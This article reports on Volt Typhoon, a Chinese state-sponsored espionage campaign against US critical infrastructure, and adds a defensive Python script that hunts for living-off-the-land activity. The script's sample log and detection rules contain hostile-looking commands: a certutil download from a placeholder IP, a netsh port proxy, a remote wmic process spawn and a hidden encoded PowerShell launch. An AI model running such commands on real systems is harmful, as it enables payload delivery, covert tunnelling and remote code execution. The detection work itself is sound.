Microsoft has uncovered the targeting of critical infrastructure organizations across the United States, including Guam, by a Chinese state-sponsored cyberespionage group it tracks as Volt Typhoon. The activity dates back to at least mid-2021 and spans government, maritime, communications, manufacturing, information technology, utilities, transportation, construction, and education organizations.
The Microsoft Threat Intelligence team assesses with moderate confidence that the Volt Typhoon campaign is pursuing capabilities that could disrupt critical communications infrastructure between the United States and the Asia region during a future crisis.
According to Microsoft, the group gains initial access through Internet-exposed Fortinet FortiGuard devices; at the time of publication Microsoft had not yet determined how those devices were being compromised, so the exact vulnerability or exploit remains unconfirmed. Once inside a target network, the operators rely on hands-on-keyboard activity and "living-off-the-land" techniques, using built-in Windows binaries (LOLBins) such as PowerShell, Certutil, Netsh, and the Windows Management Instrumentation Command-line (WMIC) rather than custom malware, which makes the activity harder to distinguish from legitimate administration.
The group has also been observed using open-source tooling, including Fast Reverse Proxy (FRP), the credential-theft tool Mimikatz, and the Impacket networking framework. A joint advisory issued by the FBI, NSA, CISA, and the cybersecurity agencies of Australia, New Zealand, the United Kingdom, and Canada corroborates these findings and focuses on how defenders can hunt for living-off-the-land activity.
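Because living-off-the-land activity uses signed, built-in binaries, the useful signal is usually in the command line rather than the executable. The following is an added example, not code from Microsoft or from the joint advisory: a small hunt over constructed Windows process-creation events (the log format, host names, IPs and the detection heuristics are all this example's own assumptions) that flags suspicious invocations of the four LOLBins named above: Certutil used for download or decoding, Netsh used to set up a port proxy, WMIC used to spawn a process on another host, and PowerShell launched hidden or with an encoded command.

```python
import re
from dataclasses import dataclass

# Hypothetical process-creation log format (constructed for this example):
# <timestamp> host=<host> user=<user> image="<full path>" cmd="<command line>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
    r'image="(?P<image>[^"]*)"\s+cmd="(?P<cmd>.*)"$'
)


@dataclass(frozen=True)
class Rule:
    name: str      # label reported on a hit
    image: str     # executable basename to match, lower-case
    pattern: str   # regex applied to the command line (case-insensitive)


# Heuristics chosen for this example; they are not the advisory's own rules and
# will need tuning against what is normal for a given environment.
RULES = [
    Rule("certutil-download-or-decode", "certutil.exe",
         r"-(urlcache|decode|encode)\b"),
    Rule("netsh-portproxy", "netsh.exe",
         r"\binterface\s+portproxy\s+add\b"),
    Rule("wmic-remote-or-spawned-process", "wmic.exe",
         r"\bprocess\s+call\s+create\b|/node:"),
    Rule("powershell-hidden-or-encoded", "powershell.exe",
         r"-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden"),
]

# Constructed sample events: four suspicious invocations and two benign ones.
SAMPLE_LOG = r"""
2023-05-24T10:01:02Z host=WS01 user=CORP\jdoe image="C:\Windows\System32\certutil.exe" cmd="certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Users\Public\a.txt"
2023-05-24T10:02:10Z host=WS01 user=CORP\jdoe image="C:\Windows\System32\netsh.exe" cmd="netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5 connectport=3389"
2023-05-24T10:03:00Z host=WS01 user=CORP\svc image="C:\Windows\System32\wbem\WMIC.exe" cmd="wmic /node:10.0.0.7 process call create cmd.exe /c whoami"
2023-05-24T10:04:00Z host=WS01 user=CORP\jdoe image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -nop -w hidden -enc SQBFAFgA"
2023-05-24T10:06:00Z host=WS02 user=CORP\alice image="C:\Windows\System32\certutil.exe" cmd="certutil -verify cert.cer"
2023-05-24T10:07:00Z host=WS02 user=CORP\bob image="C:\Windows\System32\netsh.exe" cmd="netsh interface show interface"
"""


def parse_event(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def scan(lines):
    """Return (rule name, host, user, command line) for every event a rule matches."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        # Match on the executable basename so the install path does not matter.
        base = ev["image"].rsplit("\\", 1)[-1].lower()
        for rule in RULES:
            if base == rule.image and re.search(rule.pattern, ev["cmd"], re.IGNORECASE):
                hits.append((rule.name, ev["host"], ev["user"], ev["cmd"]))
    return hits


if __name__ == "__main__":
    for name, host, user, cmd in scan(SAMPLE_LOG.splitlines()):
        print(f"[{name}] {host} {user}: {cmd}")
```

Each of these commands is also used legitimately by administrators, so a hit is a lead to triage, not a verdict: the practical step the advisory emphasizes is to baseline which accounts and hosts normally run these binaries with these arguments, then treat deviations (a user workstation adding a port proxy, a service account spawning processes on remote hosts) as the anomaly worth investigating.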